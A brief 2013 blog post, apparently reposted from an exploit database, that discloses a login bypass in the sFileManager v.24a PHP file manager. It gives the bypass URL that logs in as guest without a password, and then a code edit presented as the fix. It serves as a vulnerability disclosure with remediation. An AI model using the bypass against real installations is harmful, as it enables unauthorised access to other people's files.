[Exploit]sFileManager v.24a Login Bypass and Fix

Saturday, June 29, 2013
Name:YuLaw
Description:Exploit
Website:http://exploit-db.com
Victim:http://onedotoh.sourceforge.net/

> Bypass Login : http://[your site]/fm.php?u=guest

> How To FIX
- Ctrl + F Find : elseif (($user == $u  || $user == "" ) && !$loginfailed) {
And Edit : elseif (($user == $u && $password == $pass || $user == "") && !$loginfailed) {

Have 0 comments:

Post a Comment